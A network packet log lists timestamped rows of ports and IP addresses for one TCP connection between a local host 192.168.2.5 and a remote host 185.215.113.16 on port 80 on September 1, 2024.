Sep 1, 2024 06:28:04.695125103 CEST	80	49705	185.215.113.16	192.168.2.5
Sep 1, 2024 06:28:04.695133924 CEST	80	49705	185.215.113.16	192.168.2.5
Sep 1, 2024 06:28:04.695143938 CEST	80	49705	185.215.113.16	192.168.2.5
Sep 1, 2024 06:28:04.695152998 CEST	80	49705	185.215.113.16	192.168.2.5
Sep 1, 2024 06:28:04.695159912 CEST	49705	80	192.168.2.5	185.215.113.16
Sep 1, 2024 06:28:04.695187092 CEST	49705	80	192.168.2.5	185.215.113.16
Sep 1, 2024 06:28:04.695204020 CEST	80	49705	185.215.113.16	192.168.2.5
Sep 1, 2024 06:28:04.695214033 CEST	80	49705	185.215.113.16	192.168.2.5
Sep 1, 2024 06:28:04.695224047 CEST	80	49705	185.215.113.16	192.168.2.5
Sep 1, 2024 06:28:04.695233107 CEST	80	49705	185.215.113.16	192.168.2.5
Sep 1, 2024 06:28:04.695241928 CEST	80	49705	185.215.113.16	192.168.2.5
Sep 1, 2024 06:28:04.695249081 CEST	49705	80	192.168.2.5	185.215.113.16
Sep 1, 2024 06:28:04.695256948 CEST	80	49705	185.215.113.16	192.168.2.5
Sep 1, 2024 06:28:04.695269108 CEST	49705	80	192.168.2.5	185.215.113.16
Sep 1, 2024 06:28:04.695276976 CEST	49705	80	192.168.2.5	185.215.113.16
Sep 1, 2024 06:28:04.695297003 CEST	80	49705	185.215.113.16	192.168.2.5
Sep 1, 2024 06:28:04.695303917 CEST	49705	80	192.168.2.5	185.215.113.16
Sep 1, 2024 06:28:04.695307016 CEST	80	49705	185.215.113.16	192.168.2.5
Sep 1, 2024 06:28:04.695333004 CEST	49705	80	192.168.2.5	185.215.113.16
Sep 1, 2024 06:28:04.695471048 CEST	80	49705	185.215.113.16	192.168.2.5
Sep 1, 2024 06:28:04.695482969 CEST	80	49705	185.215.113.16	192.168.2.5
Sep 1, 2024 06:28:04.695511103 CEST	49705	80	192.168.2.5	185.215.113.16
Sep 1, 2024 06:28:04.695527077 CEST	49705	80	192.168.2.5	185.215.113.16
Sep 1, 2024 06:28:04.695532084 CEST	80	49705	185.215.113.16	192.168.2.5
Sep 1, 2024 06:28:04.695542097 CEST	80	49705	185.215.113.16	192.168.2.5
Sep 1, 2024 06:28:04.695553064 CEST	80	49705	185.215.113.16	192.168.2.5
Sep 1, 2024 06:28:04.695565939 CEST	49705	80	192.168.2.5	185.215.113.16
Sep 1, 2024 06:28:04.695569038 CEST	80	49705	185.215.113.16	192.168.2.5
Sep 1, 2024 06:28:04.695583105 CEST	49705	80	192.168.2.5	185.215.113.16
Sep 1, 2024 06:28:04.695606947 CEST	49705	80	192.168.2.5	185.215.113.16
Sep 1, 2024 06:28:04.695627928 CEST	80	49705	185.215.113.16	192.168.2.5
Sep 1, 2024 06:28:04.695668936 CEST	49705	80	192.168.2.5	185.215.113.16
Sep 1, 2024 06:28:04.695710897 CEST	80	49705	185.215.113.16	192.168.2.5
Sep 1, 2024 06:28:04.695720911 CEST	80	49705	185.215.113.16	192.168.2.5
Sep 1, 2024 06:28:04.695729017 CEST	80	49705	185.215.113.16	192.168.2.5
Sep 1, 2024 06:28:04.695739031 CEST	80	49705	185.215.113.16	192.168.2.5
Sep 1, 2024 06:28:04.695749998 CEST	80	49705	185.215.113.16	192.168.2.5
Sep 1, 2024 06:28:04.695749998 CEST	49705	80	192.168.2.5	185.215.113.16
Sep 1, 2024 06:28:04.695760012 CEST	80	49705	185.215.113.16	192.168.2.5
Sep 1, 2024 06:28:04.695760965 CEST	49705	80	192.168.2.5	185.215.113.16
Sep 1, 2024 06:28:04.695777893 CEST	80	49705	185.215.113.16	192.168.2.5
Sep 1, 2024 06:28:04.695779085 CEST	49705	80	192.168.2.5	185.215.113.16
Sep 1, 2024 06:28:04.695796013 CEST	80	49705	185.215.113.16	192.168.2.5
Sep 1, 2024 06:28:04.695802927 CEST	49705	80	192.168.2.5	185.215.113.16
Sep 1, 2024 06:28:04.695807934 CEST	80	49705	185.215.113.16	192.168.2.5
Sep 1, 2024 06:28:04.695818901 CEST	80	49705	185.215.113.16	192.168.2.5
Sep 1, 2024 06:28:04.695822954 CEST	49705	80	192.168.2.5	185.215.113.16
Sep 1, 2024 06:28:04.695837021 CEST	49705	80	192.168.2.5	185.215.113.16
Sep 1, 2024 06:28:04.695842028 CEST	80	49705	185.215.113.16	192.168.2.5
Sep 1, 2024 06:28:04.695854902 CEST	49705	80	192.168.2.5	185.215.113.16
Sep 1, 2024 06:28:04.695868015 CEST	49705	80	192.168.2.5	185.215.113.16
Sep 1, 2024 06:28:04.714201927 CEST	80	49705	185.215.113.16	192.168.2.5
Sep 1, 2024 06:28:04.714282990 CEST	80	49705	185.215.113.16	192.168.2.5
Sep 1, 2024 06:28:04.714293957 CEST	80	49705	185.215.113.16	192.168.2.5
Sep 1, 2024 06:28:04.714296103 CEST	49705	80	192.168.2.5	185.215.113.16
Sep 1, 2024 06:28:04.714324951 CEST	49705	80	192.168.2.5	185.215.113.16
Sep 1, 2024 06:28:04.714338064 CEST	49705	80	192.168.2.5	185.215.113.16
Sep 1, 2024 06:28:04.714407921 CEST	80	49705	185.215.113.16	192.168.2.5
Sep 1, 2024 06:28:04.714417934 CEST	80	49705	185.215.113.16	192.168.2.5
Sep 1, 2024 06:28:04.714428902 CEST	80	49705	185.215.113.16	192.168.2.5
Sep 1, 2024 06:28:04.714438915 CEST	80	49705	185.215.113.16	192.168.2.5
Sep 1, 2024 06:28:04.714448929 CEST	80	49705	185.215.113.16	192.168.2.5
Sep 1, 2024 06:28:04.714451075 CEST	49705	80	192.168.2.5	185.215.113.16
Sep 1, 2024 06:28:04.714483023 CEST	49705	80	192.168.2.5	185.215.113.16
Sep 1, 2024 06:28:04.714637995 CEST	80	49705	185.215.113.16	192.168.2.5
Sep 1, 2024 06:28:04.714648008 CEST	80	49705	185.215.113.16	192.168.2.5
Sep 1, 2024 06:28:04.714658976 CEST	80	49705	185.215.113.16	192.168.2.5
Sep 1, 2024 06:28:04.714669943 CEST	80	49705	185.215.113.16	192.168.2.5
Sep 1, 2024 06:28:04.714679956 CEST	80	49705	185.215.113.16	192.168.2.5
Sep 1, 2024 06:28:04.714682102 CEST	49705	80	192.168.2.5	185.215.113.16
Sep 1, 2024 06:28:04.714692116 CEST	80	49705	185.215.113.16	192.168.2.5
Sep 1, 2024 06:28:04.714700937 CEST	49705	80	192.168.2.5	185.215.113.16
Sep 1, 2024 06:28:04.714716911 CEST	49705	80	192.168.2.5	185.215.113.16
Sep 1, 2024 06:28:04.714740992 CEST	49705	80	192.168.2.5	185.215.113.16
Sep 1, 2024 06:28:04.714916945 CEST	80	49705	185.215.113.16	192.168.2.5
Sep 1, 2024 06:28:04.714926004 CEST	80	49705	185.215.113.16	192.168.2.5
Sep 1, 2024 06:28:04.714941978 CEST	80	49705	185.215.113.16	192.168.2.5
Sep 1, 2024 06:28:04.714952946 CEST	80	49705	185.215.113.16	192.168.2.5
Sep 1, 2024 06:28:04.714956999 CEST	49705	80	192.168.2.5	185.215.113.16
Sep 1, 2024 06:28:04.714962959 CEST	80	49705	185.215.113.16	192.168.2.5
Sep 1, 2024 06:28:04.714972973 CEST	80	49705	185.215.113.16	192.168.2.5
Sep 1, 2024 06:28:04.714977980 CEST	49705	80	192.168.2.5	185.215.113.16
Sep 1, 2024 06:28:04.714998960 CEST	49705	80	192.168.2.5	185.215.113.16
Sep 1, 2024 06:28:04.715022087 CEST	49705	80	192.168.2.5	185.215.113.16
Sep 1, 2024 06:28:04.715032101 CEST	80	49705	185.215.113.16	192.168.2.5
Sep 1, 2024 06:28:04.715042114 CEST	80	49705	185.215.113.16	192.168.2.5
Sep 1, 2024 06:28:04.715063095 CEST	49705	80	192.168.2.5	185.215.113.16
Sep 1, 2024 06:28:04.715074062 CEST	49705	80	192.168.2.5	185.215.113.16
Sep 1, 2024 06:28:04.778662920 CEST	80	49705	185.215.113.16	192.168.2.5
Sep 1, 2024 06:28:04.778733015 CEST	49705	80	192.168.2.5	185.215.113.16
Sep 1, 2024 06:28:04.778768063 CEST	80	49705	185.215.113.16	192.168.2.5
Sep 1, 2024 06:28:04.778779984 CEST	80	49705	185.215.113.16	192.168.2.5
Sep 1, 2024 06:28:04.778806925 CEST	49705	80	192.168.2.5	185.215.113.16
Sep 1, 2024 06:28:04.778825998 CEST	49705	80	192.168.2.5	185.215.113.16
Sep 1, 2024 06:28:04.779014111 CEST	80	49705	185.215.113.16	192.168.2.5
Sep 1, 2024 06:28:04.779025078 CEST	80	49705	185.215.113.16	192.168.2.5
Sep 1, 2024 06:28:04.779036045 CEST	80	49705	185.215.113.16	192.168.2.5
Sep 1, 2024 06:28:04.779046059 CEST	80	49705	185.215.113.16	192.168.2.5
Sep 1, 2024 06:28:04.779055119 CEST	49705	80	192.168.2.5	185.215.113.16
Sep 1, 2024 06:28:04.779057980 CEST	80	49705	185.215.113.16	192.168.2.5
Sep 1, 2024 06:28:04.779073000 CEST	49705	80	192.168.2.5	185.215.113.16
Sep 1, 2024 06:28:04.779112101 CEST	49705	80	192.168.2.5	185.215.113.16
Sep 1, 2024 06:28:04.780010939 CEST	80	49705	185.215.113.16	192.168.2.5
Sep 1, 2024 06:28:04.780021906 CEST	80	49705	185.215.113.16	192.168.2.5
Sep 1, 2024 06:28:04.780031919 CEST	80	49705	185.215.113.16	192.168.2.5
Sep 1, 2024 06:28:04.780042887 CEST	80	49705	185.215.113.16	192.168.2.5
Sep 1, 2024 06:28:04.780052900 CEST	80	49705	185.215.113.16	192.168.2.5
Sep 1, 2024 06:28:04.780055046 CEST	49705	80	192.168.2.5	185.215.113.16
Sep 1, 2024 06:28:04.780065060 CEST	80	49705	185.215.113.16	192.168.2.5
Sep 1, 2024 06:28:04.780071020 CEST	80	49705	185.215.113.16	192.168.2.5
Sep 1, 2024 06:28:04.780081987 CEST	80	49705	185.215.113.16	192.168.2.5
Sep 1, 2024 06:28:04.780087948 CEST	49705	80	192.168.2.5	185.215.113.16
Sep 1, 2024 06:28:04.780092955 CEST	80	49705	185.215.113.16	192.168.2.5
Sep 1, 2024 06:28:04.780105114 CEST	80	49705	185.215.113.16	192.168.2.5
Sep 1, 2024 06:28:04.780122995 CEST	49705	80	192.168.2.5	185.215.113.16
Sep 1, 2024 06:28:04.780144930 CEST	49705	80	192.168.2.5	185.215.113.16
Sep 1, 2024 06:28:04.780730963 CEST	80	49705	185.215.113.16	192.168.2.5
Sep 1, 2024 06:28:04.780740976 CEST	80	49705	185.215.113.16	192.168.2.5
Sep 1, 2024 06:28:04.780751944 CEST	80	49705	185.215.113.16	192.168.2.5
Sep 1, 2024 06:28:04.780771971 CEST	49705	80	192.168.2.5	185.215.113.16
Sep 1, 2024 06:28:04.780802011 CEST	49705	80	192.168.2.5	185.215.113.16
Sep 1, 2024 06:28:04.780844927 CEST	80	49705	185.215.113.16	192.168.2.5
Sep 1, 2024 06:28:04.780854940 CEST	80	49705	185.215.113.16	192.168.2.5
Sep 1, 2024 06:28:04.780864954 CEST	80	49705	185.215.113.16	192.168.2.5
Sep 1, 2024 06:28:04.780874968 CEST	80	49705	185.215.113.16	192.168.2.5
Sep 1, 2024 06:28:04.780885935 CEST	80	49705	185.215.113.16	192.168.2.5
Sep 1, 2024 06:28:04.780889988 CEST	49705	80	192.168.2.5	185.215.113.16
Sep 1, 2024 06:28:04.780898094 CEST	80	49705	185.215.113.16	192.168.2.5
Sep 1, 2024 06:28:04.780916929 CEST	49705	80	192.168.2.5	185.215.113.16
Sep 1, 2024 06:28:04.780951977 CEST	49705	80	192.168.2.5	185.215.113.16
Sep 1, 2024 06:28:04.781019926 CEST	80	49705	185.215.113.16	192.168.2.5
Sep 1, 2024 06:28:04.781064034 CEST	49705	80	192.168.2.5	185.215.113.16
Sep 1, 2024 06:28:04.782018900 CEST	80	49705	185.215.113.16	192.168.2.5
Sep 1, 2024 06:28:04.782030106 CEST	80	49705	185.215.113.16	192.168.2.5
Sep 1, 2024 06:28:04.782040119 CEST	80	49705	185.215.113.16	192.168.2.5
Sep 1, 2024 06:28:04.782048941 CEST	80	49705	185.215.113.16	192.168.2.5
Sep 1, 2024 06:28:04.782064915 CEST	80	49705	185.215.113.16	192.168.2.5
Sep 1, 2024 06:28:04.782074928 CEST	49705	80	192.168.2.5	185.215.113.16
Sep 1, 2024 06:28:04.782074928 CEST	80	49705	185.215.113.16	192.168.2.5
Sep 1, 2024 06:28:04.782085896 CEST	80	49705	185.215.113.16	192.168.2.5
Sep 1, 2024 06:28:04.782095909 CEST	80	49705	185.215.113.16	192.168.2.5
Sep 1, 2024 06:28:04.782104015 CEST	49705	80	192.168.2.5	185.215.113.16
Sep 1, 2024 06:28:04.782107115 CEST	80	49705	185.215.113.16	192.168.2.5
Sep 1, 2024 06:28:04.782110929 CEST	49705	80	192.168.2.5	185.215.113.16
Sep 1, 2024 06:28:04.782115936 CEST	80	49705	185.215.113.16	192.168.2.5
Sep 1, 2024 06:28:04.782125950 CEST	80	49705	185.215.113.16	192.168.2.5
Sep 1, 2024 06:28:04.782135963 CEST	80	49705	185.215.113.16	192.168.2.5
Sep 1, 2024 06:28:04.782140970 CEST	49705	80	192.168.2.5	185.215.113.16
Sep 1, 2024 06:28:04.782145977 CEST	80	49705	185.215.113.16	192.168.2.5
Sep 1, 2024 06:28:04.782156944 CEST	80	49705	185.215.113.16	192.168.2.5
Sep 1, 2024 06:28:04.782174110 CEST	49705	80	192.168.2.5	185.215.113.16
Sep 1, 2024 06:28:04.782190084 CEST	49705	80	192.168.2.5	185.215.113.16
Sep 1, 2024 06:28:04.783646107 CEST	80	49705	185.215.113.16	192.168.2.5
Sep 1, 2024 06:28:04.783660889 CEST	80	49705	185.215.113.16	192.168.2.5
Sep 1, 2024 06:28:04.783670902 CEST	80	49705	185.215.113.16	192.168.2.5
Sep 1, 2024 06:28:04.783680916 CEST	80	49705	185.215.113.16	192.168.2.5
Sep 1, 2024 06:28:04.783690929 CEST	49705	80	192.168.2.5	185.215.113.16
Sep 1, 2024 06:28:04.783690929 CEST	80	49705	185.215.113.16	192.168.2.5
Sep 1, 2024 06:28:04.783700943 CEST	80	49705	185.215.113.16	192.168.2.5
Sep 1, 2024 06:28:04.783710957 CEST	80	49705	185.215.113.16	192.168.2.5
Sep 1, 2024 06:28:04.783720016 CEST	80	49705	185.215.113.16	192.168.2.5
Sep 1, 2024 06:28:04.783729076 CEST	49705	80	192.168.2.5	185.215.113.16
Sep 1, 2024 06:28:04.783730984 CEST	80	49705	185.215.113.16	192.168.2.5
Sep 1, 2024 06:28:04.783740044 CEST	80	49705	185.215.113.16	192.168.2.5
Sep 1, 2024 06:28:04.783750057 CEST	80	49705	185.215.113.16	192.168.2.5
Sep 1, 2024 06:28:04.783756971 CEST	49705	80	192.168.2.5	185.215.113.16
Sep 1, 2024 06:28:04.783761024 CEST	80	49705	185.215.113.16	192.168.2.5
Sep 1, 2024 06:28:04.783771038 CEST	80	49705	185.215.113.16	192.168.2.5
Sep 1, 2024 06:28:04.783777952 CEST	49705	80	192.168.2.5	185.215.113.16
Sep 1, 2024 06:28:04.783780098 CEST	80	49705	185.215.113.16	192.168.2.5
Sep 1, 2024 06:28:04.783791065 CEST	49705	80	192.168.2.5	185.215.113.16
Sep 1, 2024 06:28:04.783792973 CEST	80	49705	185.215.113.16	192.168.2.5
Sep 1, 2024 06:28:04.783818007 CEST	49705	80	192.168.2.5	185.215.113.16
Sep 1, 2024 06:28:04.783833981 CEST	49705	80	192.168.2.5	185.215.113.16
Sep 1, 2024 06:28:04.784795046 CEST	80	49705	185.215.113.16	192.168.2.5
Sep 1, 2024 06:28:04.784805059 CEST	80	49705	185.215.113.16	192.168.2.5
Sep 1, 2024 06:28:04.784815073 CEST	80	49705	185.215.113.16	192.168.2.5
Sep 1, 2024 06:28:04.784826040 CEST	80	49705	185.215.113.16	192.168.2.5
Sep 1, 2024 06:28:04.784835100 CEST	80	49705	185.215.113.16	192.168.2.5
Sep 1, 2024 06:28:04.784843922 CEST	80	49705	185.215.113.16	192.168.2.5
Sep 1, 2024 06:28:04.784849882 CEST	49705	80	192.168.2.5	185.215.113.16
Sep 1, 2024 06:28:04.784854889 CEST	80	49705	185.215.113.16	192.168.2.5
Sep 1, 2024 06:28:04.784863949 CEST	80	49705	185.215.113.16	192.168.2.5
Sep 1, 2024 06:28:04.784874916 CEST	80	49705	185.215.113.16	192.168.2.5
Sep 1, 2024 06:28:04.784884930 CEST	80	49705	185.215.113.16	192.168.2.5
Sep 1, 2024 06:28:04.784885883 CEST	49705	80	192.168.2.5	185.215.113.16
Sep 1, 2024 06:28:04.784893990 CEST	80	49705	185.215.113.16	192.168.2.5
Sep 1, 2024 06:28:04.784904957 CEST	80	49705	185.215.113.16	192.168.2.5
Sep 1, 2024 06:28:04.784913063 CEST	49705	80	192.168.2.5	185.215.113.16
Sep 1, 2024 06:28:04.784914970 CEST	80	49705	185.215.113.16	192.168.2.5
Sep 1, 2024 06:28:04.784924984 CEST	80	49705	185.215.113.16	192.168.2.5
Sep 1, 2024 06:28:04.784934998 CEST	49705	80	192.168.2.5	185.215.113.16
Sep 1, 2024 06:28:04.784934998 CEST	80	49705	185.215.113.16	192.168.2.5
Sep 1, 2024 06:28:04.784966946 CEST	49705	80	192.168.2.5	185.215.113.16
Sep 1, 2024 06:28:04.784976006 CEST	49705	80	192.168.2.5	185.215.113.16
Sep 1, 2024 06:28:04.785415888 CEST	80	49705	185.215.113.16	192.168.2.5
Sep 1, 2024 06:28:04.785427094 CEST	80	49705	185.215.113.16	192.168.2.5
Sep 1, 2024 06:28:04.785437107 CEST	80	49705	185.215.113.16	192.168.2.5
Sep 1, 2024 06:28:04.785449028 CEST	80	49705	185.215.113.16	192.168.2.5
Sep 1, 2024 06:28:04.785459042 CEST	80	49705	185.215.113.16	192.168.2.5
Sep 1, 2024 06:28:04.785469055 CEST	80	49705	185.215.113.16	192.168.2.5
Sep 1, 2024 06:28:04.785470009 CEST	49705	80	192.168.2.5	185.215.113.16
Sep 1, 2024 06:28:04.785479069 CEST	80	49705	185.215.113.16	192.168.2.5
Sep 1, 2024 06:28:04.785500050 CEST	49705	80	192.168.2.5	185.215.113.16
Sep 1, 2024 06:28:04.785521984 CEST	49705	80	192.168.2.5	185.215.113.16
Sep 1, 2024 06:28:04.839643955 CEST	80	49705	185.215.113.16	192.168.2.5
Sep 1, 2024 06:28:04.839656115 CEST	80	49705	185.215.113.16	192.168.2.5
Sep 1, 2024 06:28:04.839667082 CEST	80	49705	185.215.113.16	192.168.2.5
Sep 1, 2024 06:28:04.839715958 CEST	49705	80	192.168.2.5	185.215.113.16
Sep 1, 2024 06:28:04.839896917 CEST	80	49705	185.215.113.16	192.168.2.5
Sep 1, 2024 06:28:04.839941025 CEST	49705	80	192.168.2.5	185.215.113.16
Sep 1, 2024 06:28:04.840137959 CEST	80	49705	185.215.113.16	192.168.2.5
Sep 1, 2024 06:28:04.840178967 CEST	49705	80	192.168.2.5	185.215.113.16
Sep 1, 2024 06:28:04.840270042 CEST	80	49705	185.215.113.16	192.168.2.5
Sep 1, 2024 06:28:04.840280056 CEST	80	49705	185.215.113.16	192.168.2.5
Sep 1, 2024 06:28:04.840291977 CEST	80	49705	185.215.113.16	192.168.2.5
Sep 1, 2024 06:28:04.840315104 CEST	49705	80	192.168.2.5	185.215.113.16
Sep 1, 2024 06:28:04.840332031 CEST	49705	80	192.168.2.5	185.215.113.16
Sep 1, 2024 06:28:04.840550900 CEST	80	49705	185.215.113.16	192.168.2.5
Sep 1, 2024 06:28:04.840563059 CEST	80	49705	185.215.113.16	192.168.2.5
Sep 1, 2024 06:28:04.840590954 CEST	49705	80	192.168.2.5	185.215.113.16
Sep 1, 2024 06:28:04.840779066 CEST	80	49705	185.215.113.16	192.168.2.5
Sep 1, 2024 06:28:04.840790033 CEST	80	49705	185.215.113.16	192.168.2.5
Sep 1, 2024 06:28:04.840800047 CEST	80	49705	185.215.113.16	192.168.2.5
Sep 1, 2024 06:28:04.840816021 CEST	80	49705	185.215.113.16	192.168.2.5
Sep 1, 2024 06:28:04.840820074 CEST	49705	80	192.168.2.5	185.215.113.16
Sep 1, 2024 06:28:04.840842962 CEST	49705	80	192.168.2.5	185.215.113.16
Sep 1, 2024 06:28:04.840856075 CEST	49705	80	192.168.2.5	185.215.113.16
Sep 1, 2024 06:28:04.841438055 CEST	80	49705	185.215.113.16	192.168.2.5
Sep 1, 2024 06:28:04.841478109 CEST	49705	80	192.168.2.5	185.215.113.16
Sep 1, 2024 06:28:04.841666937 CEST	80	49705	185.215.113.16	192.168.2.5
Sep 1, 2024 06:28:04.841675997 CEST	80	49705	185.215.113.16	192.168.2.5
Sep 1, 2024 06:28:04.841691017 CEST	80	49705	185.215.113.16	192.168.2.5
Sep 1, 2024 06:28:04.841705084 CEST	49705	80	192.168.2.5	185.215.113.16
Sep 1, 2024 06:28:04.841713905 CEST	80	49705	185.215.113.16	192.168.2.5
Sep 1, 2024 06:28:04.841725111 CEST	80	49705	185.215.113.16	192.168.2.5
Sep 1, 2024 06:28:04.841726065 CEST	49705	80	192.168.2.5	185.215.113.16
Sep 1, 2024 06:28:04.841736078 CEST	80	49705	185.215.113.16	192.168.2.5
Sep 1, 2024 06:28:04.841747046 CEST	49705	80	192.168.2.5	185.215.113.16
Sep 1, 2024 06:28:04.841758966 CEST	49705	80	192.168.2.5	185.215.113.16
Sep 1, 2024 06:28:04.841778040 CEST	49705	80	192.168.2.5	185.215.113.16
Sep 1, 2024 06:28:04.841924906 CEST	80	49705	185.215.113.16	192.168.2.5
Sep 1, 2024 06:28:04.841934919 CEST	80	49705	185.215.113.16	192.168.2.5
Sep 1, 2024 06:28:04.841944933 CEST	80	49705	185.215.113.16	192.168.2.5
Sep 1, 2024 06:28:04.841954947 CEST	80	49705	185.215.113.16	192.168.2.5
Sep 1, 2024 06:28:04.841965914 CEST	80	49705	185.215.113.16	192.168.2.5
Sep 1, 2024 06:28:04.841965914 CEST	49705	80	192.168.2.5	185.215.113.16
Sep 1, 2024 06:28:04.841974974 CEST	80	49705	185.215.113.16	192.168.2.5
Sep 1, 2024 06:28:04.841983080 CEST	49705	80	192.168.2.5	185.215.113.16
Sep 1, 2024 06:28:04.841986895 CEST	80	49705	185.215.113.16	192.168.2.5
Sep 1, 2024 06:28:04.841995001 CEST	49705	80	192.168.2.5	185.215.113.16
Sep 1, 2024 06:28:04.841996908 CEST	80	49705	185.215.113.16	192.168.2.5
Sep 1, 2024 06:28:04.842009068 CEST	80	49705	185.215.113.16	192.168.2.5
Sep 1, 2024 06:28:04.842030048 CEST	49705	80	192.168.2.5	185.215.113.16
Sep 1, 2024 06:28:04.842036009 CEST	49705	80	192.168.2.5	185.215.113.16
Sep 1, 2024 06:28:04.842056990 CEST	49705	80	192.168.2.5	185.215.113.16
Sep 1, 2024 06:28:04.842556953 CEST	80	49705	185.215.113.16	192.168.2.5
Sep 1, 2024 06:28:04.842567921 CEST	80	49705	185.215.113.16	192.168.2.5
Sep 1, 2024 06:28:04.842577934 CEST	80	49705	185.215.113.16	192.168.2.5
Sep 1, 2024 06:28:04.842587948 CEST	80	49705	185.215.113.16	192.168.2.5
Sep 1, 2024 06:28:04.842597961 CEST	80	49705	185.215.113.16	192.168.2.5
Sep 1, 2024 06:28:04.842601061 CEST	49705	80	192.168.2.5	185.215.113.16
Sep 1, 2024 06:28:04.842624903 CEST	49705	80	192.168.2.5	185.215.113.16
Sep 1, 2024 06:28:04.842634916 CEST	49705	80	192.168.2.5	185.215.113.16
Sep 1, 2024 06:28:04.843008041 CEST	80	49705	185.215.113.16	192.168.2.5
Sep 1, 2024 06:28:04.843018055 CEST	80	49705	185.215.113.16	192.168.2.5
Sep 1, 2024 06:28:04.843028069 CEST	80	49705	185.215.113.16	192.168.2.5
Sep 1, 2024 06:28:04.843039036 CEST	80	49705	185.215.113.16	192.168.2.5
Sep 1, 2024 06:28:04.843050003 CEST	49705	80	192.168.2.5	185.215.113.16
Sep 1, 2024 06:28:04.843075037 CEST	49705	80	192.168.2.5	185.215.113.16
Sep 1, 2024 06:28:05.086618900 CEST	80	49705	185.215.113.16	192.168.2.5
Sep 1, 2024 06:28:05.086687088 CEST	80	49705	185.215.113.16	192.168.2.5
Sep 1, 2024 06:28:05.086695910 CEST	49705	80	192.168.2.5	185.215.113.16
Sep 1, 2024 06:28:05.086698055 CEST	80	49705	185.215.113.16	192.168.2.5
Sep 1, 2024 06:28:05.086744070 CEST	49705	80	192.168.2.5	185.215.113.16
Sep 1, 2024 06:28:05.086929083 CEST	80	49705	185.215.113.16	192.168.2.5
Sep 1, 2024 06:28:05.086939096 CEST	80	49705	185.215.113.16	192.168.2.5
Sep 1, 2024 06:28:05.086949110 CEST	80	49705	185.215.113.16	192.168.2.5
Sep 1, 2024 06:28:05.086958885 CEST	80	49705	185.215.113.16	192.168.2.5
Sep 1, 2024 06:28:05.086966991 CEST	49705	80	192.168.2.5	185.215.113.16
Sep 1, 2024 06:28:05.086971045 CEST	80	49705	185.215.113.16	192.168.2.5
Sep 1, 2024 06:28:05.086999893 CEST	49705	80	192.168.2.5	185.215.113.16
Sep 1, 2024 06:28:05.087027073 CEST	49705	80	192.168.2.5	185.215.113.16
Sep 1, 2024 06:28:05.087455034 CEST	80	49705	185.215.113.16	192.168.2.5
Sep 1, 2024 06:28:05.087466002 CEST	80	49705	185.215.113.16	192.168.2.5
Sep 1, 2024 06:28:05.087476015 CEST	80	49705	185.215.113.16	192.168.2.5
Sep 1, 2024 06:28:05.087492943 CEST	49705	80	192.168.2.5	185.215.113.16
Sep 1, 2024 06:28:05.087497950 CEST	80	49705	185.215.113.16	192.168.2.5
Sep 1, 2024 06:28:05.087508917 CEST	80	49705	185.215.113.16	192.168.2.5
Sep 1, 2024 06:28:05.087516069 CEST	49705	80	192.168.2.5	185.215.113.16
Sep 1, 2024 06:28:05.087517977 CEST	80	49705	185.215.113.16	192.168.2.5
Sep 1, 2024 06:28:05.087528944 CEST	80	49705	185.215.113.16	192.168.2.5
Sep 1, 2024 06:28:05.087538958 CEST	80	49705	185.215.113.16	192.168.2.5
Sep 1, 2024 06:28:05.087541103 CEST	49705	80	192.168.2.5	185.215.113.16
Sep 1, 2024 06:28:05.087548971 CEST	80	49705	185.215.113.16	192.168.2.5
Sep 1, 2024 06:28:05.087558031 CEST	80	49705	185.215.113.16	192.168.2.5
Sep 1, 2024 06:28:05.087563038 CEST	49705	80	192.168.2.5	185.215.113.16
Sep 1, 2024 06:28:05.087605953 CEST	49705	80	192.168.2.5	185.215.113.16
Sep 1, 2024 06:28:05.088284969 CEST	80	49705	185.215.113.16	192.168.2.5
Sep 1, 2024 06:28:05.088295937 CEST	80	49705	185.215.113.16	192.168.2.5
Sep 1, 2024 06:28:05.088305950 CEST	80	49705	185.215.113.16	192.168.2.5
Sep 1, 2024 06:28:05.088315964 CEST	80	49705	185.215.113.16	192.168.2.5
Sep 1, 2024 06:28:05.088318110 CEST	49705	80	192.168.2.5	185.215.113.16
Sep 1, 2024 06:28:05.088325024 CEST	49705	80	192.168.2.5	185.215.113.16
Sep 1, 2024 06:28:05.088325024 CEST	80	49705	185.215.113.16	192.168.2.5
Sep 1, 2024 06:28:05.088335037 CEST	80	49705	185.215.113.16	192.168.2.5
Sep 1, 2024 06:28:05.088346004 CEST	80	49705	185.215.113.16	192.168.2.5
Sep 1, 2024 06:28:05.088355064 CEST	80	49705	185.215.113.16	192.168.2.5
Sep 1, 2024 06:28:05.088359118 CEST	49705	80	192.168.2.5	185.215.113.16
Sep 1, 2024 06:28:05.088365078 CEST	80	49705	185.215.113.16	192.168.2.5
Sep 1, 2024 06:28:05.088375092 CEST	80	49705	185.215.113.16	192.168.2.5
Sep 1, 2024 06:28:05.088385105 CEST	80	49705	185.215.113.16	192.168.2.5
Sep 1, 2024 06:28:05.088393927 CEST	49705	80	192.168.2.5	185.215.113.16
Sep 1, 2024 06:28:05.088393927 CEST	80	49705	185.215.113.16	192.168.2.5
Sep 1, 2024 06:28:05.088412046 CEST	49705	80	192.168.2.5	185.215.113.16
Sep 1, 2024 06:28:05.088432074 CEST	49705	80	192.168.2.5	185.215.113.16
Sep 1, 2024 06:28:05.089312077 CEST	80	49705	185.215.113.16	192.168.2.5
Sep 1, 2024 06:28:05.089322090 CEST	80	49705	185.215.113.16	192.168.2.5
Sep 1, 2024 06:28:05.089333057 CEST	80	49705	185.215.113.16	192.168.2.5
Sep 1, 2024 06:28:05.089343071 CEST	80	49705	185.215.113.16	192.168.2.5
Sep 1, 2024 06:28:05.089354038 CEST	80	49705	185.215.113.16	192.168.2.5
Sep 1, 2024 06:28:05.089354992 CEST	49705	80	192.168.2.5	185.215.113.16
Sep 1, 2024 06:28:05.089364052 CEST	80	49705	185.215.113.16	192.168.2.5
Sep 1, 2024 06:28:05.089373112 CEST	80	49705	185.215.113.16	192.168.2.5
Sep 1, 2024 06:28:05.089374065 CEST	49705	80	192.168.2.5	185.215.113.16
Sep 1, 2024 06:28:05.089382887 CEST	80	49705	185.215.113.16	192.168.2.5
Sep 1, 2024 06:28:05.089392900 CEST	80	49705	185.215.113.16	192.168.2.5
Sep 1, 2024 06:28:05.089401960 CEST	49705	80	192.168.2.5	185.215.113.16
Sep 1, 2024 06:28:05.089402914 CEST	80	49705	185.215.113.16	192.168.2.5
Sep 1, 2024 06:28:05.089412928 CEST	80	49705	185.215.113.16	192.168.2.5
Sep 1, 2024 06:28:05.089425087 CEST	49705	80	192.168.2.5	185.215.113.16
Sep 1, 2024 06:28:05.089437962 CEST	49705	80	192.168.2.5	185.215.113.16
Sep 1, 2024 06:28:05.089457035 CEST	49705	80	192.168.2.5	185.215.113.16
